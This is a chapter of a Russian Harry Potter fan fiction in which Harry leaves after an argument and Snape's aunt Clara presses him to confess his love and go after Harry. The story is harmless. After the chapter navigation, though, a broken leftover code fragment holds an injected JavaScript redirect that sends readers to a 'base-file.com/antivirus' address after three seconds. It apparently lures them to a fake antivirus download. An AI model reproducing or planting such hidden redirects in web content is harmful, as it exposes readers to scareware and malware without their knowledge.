– Как же плохо ты должен думать обо мне, если считаешь, что я делал бы то, чем мы занимались, будучи помолвленным с Джинни? Ты думал, я  и с тобой, и с ней? Думал, у меня какой-нибудь неконтролируемый взрыв гормонов, заставивший меня развлекаться с тобой там, в переулке, и не чувствовать ничего? – когда Северус не ответил, Гарри медленно покачал головой: – Ты хоть что-то чувствуешь ко мне? Хочешь, чтобы  я  остался?

– Я... – Северус резко умолк, напуганным тем, что чуть было не ляпнул. Если он остановится, возможно, только возможно, он сможет выйти из ситуации хоть с какими-то жалкими остатками достоинства.

Гарри точно не хочет оставаться – конечно, Гарри не останется.

– Ты... что? 

Северус не знал, что сказать, потому что собирался ответить «я хочу, чтобы ты остался». Это стало бы демонстрацией его слабости. Северус никогда никому не позволил бы увидеть свою слабость, особенно проклятому Гарри Поттеру.

И он захлопнул рот.

Гарри в слепом отчаянии покачал головой. Потом схватил с вешалки пальто и, обернувшись, остановился у двери, чтобы дать Северусу последний шанс сказать хоть что-нибудь; возможность передумать себе и дать ему, Гарри, повод остаться.

 

Но Снейп не дал.

И никогда не ненавидел себя так сильно.

 

Северус все еще стоял с каменным выражением, уставившись в окно, когда подошла Клара.

– Лучше надень шапку и шарф.

Выражение лица племянника не изменилось:

– Прости? 

– Там холодно. Тебе следует надеть шапку и шарф, когда пойдешь за ним.

– Я не собираюсь преследовать этого порывистого щенка. Если он захочет вернуться, когда успокоится, он вернется. 

– И ты собираешься ждать, когда Гарри, может быть – может быть!  успокоится и решит вернуться? 

– Он взрослый человек, тетя, он способен сам принимать решения. Кроме того, не является ли терпение достоинством?

Совершенно точно, нет. И если ты так думаешь, ты в меньшей степени мужчина, чем я считала, – она помолчала немного и добавила: – Иди за ним. Он хороший мальчик, твой Гарри.  

Что-то в её тоне насторожило Северуса. Твой Гарри. Желудок сжался. Он поправил чашки на раковине, собрался с силами и повернулся к ней: – Когда ты узнала? 

Тонкая седая бровь приподнялась.

– Не споришь? Не отрицаешь?.. Я разочарована. Думала, ты бросишь мне вызов.

– Когда ты узнала?

– Я начала подозревать, как только он вошел. 

– Как много ты знаешь?

– Почему ты интересуешься?

Северус вздохнул:

Можешь ты хоть раз ответить на вопрос, не спрашивая в ответ?

– Ты знаешь меня намного лучше.

– Просто скажи мне, к каким выводам ты пришла.

– Ты имеешь в виду, знаю ли я, что Гарри притворялся твоим fiancé? Или  что ты чувствуешь к нему что-то, а он так и не узнал об этом?

Северус никогда не терял самообладания.

Клара, симулируя беспечность, выглянула в окно: 

– Когда ты скажешь ему?

– Скажу что? 

Клара просто смотрела на него. Повисло долгое, затянувшееся молчание.

Наконец Северус не выдержал:

– Никогда.

– Ты не собираешься признаться ему? 

– А, ты, наконец, потеряла слух. Вопрос времени, тебе уже около семидесяти.

– Ты должен сказать, что любишь его. 

– Я не люблю Гарри Поттера.

Убежденной тетушка не выглядела:

– Посмотри мне в глаза и скажи, что ты его не любишь.  

Северус поднял на неё глаза и отчетливо и очень медленно выговорил:

– Я не люблю Гарри. 

– Проклятье! Может, это и сработало бы с людьми, не искушенными во лжи.

– Поверить не могу, ты назвала меня лжецом! – задохнулся Северус, симулируя обиду.

– Исключительно умелым лгуном, дорогой племянник.

– Хм, неплохо обладать самым уважаемым талантом.

– Знаешь, что я думаю?

– Как всегда.

– Ты слишком болтлив.

– А ты слишком любопытна. Все, что происходит между мной и Гарри, не твое дело.

– Скажи ему. Он заслужил правду. 

– Он заслужил? Чушь, он не заслуживает этого. Практически, если посмотреть объективно, Гарри заслуживает никогда об этом не узнать. Он заслуживает свою нормальную, необременительную жизнь.

– А ты не можешь быть нормальным и необременительным? – Северус сплел пальцы и презрительно уставился на неё. – Ладно. – Клара вскинула руки, притворно сдаваясь. – Глупый вопрос. Прости. Нормальность и несложность – в любом случае сильно переоценено. Кто угодно может найти нормального и несложного.

– Только не Гарри. Ему не часто выпадал шанс пожить нормально.

– Его родители? – осторожно спросила Клара.

– Потеря родителей – всего лишь одно событие из целого ряда, осложнивших ему жизнь.

– Он был травмирован? Так же, как и ты?

– Тетя Клара! – зашипел Северус.

– Не зови меня Тетей Кларой, Северус Снейп! Я видела его шрамы,  и его взгляд, когда он думал, что никто не видит.

– Гарри сильный. Более сильный,  чем я когда-либо был. Тебе не надо волноваться за него, тетя.

– Он не должен быть сильным в одиночестве. Никто из нас не должен. Иди и верни его, Северус. 

– Не могу. Я не знаю, что сказать и что сделать.

– Северус, иди и верни его.

– Нет. Гарри волен сам принимать решения. Я прекрасно обойдусь без него.

Произнеся это вслух, он понял, что ничто не может быть дальше от правды, чем эта фраза. 

 

И ничто, возможно, не напугало его больше.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>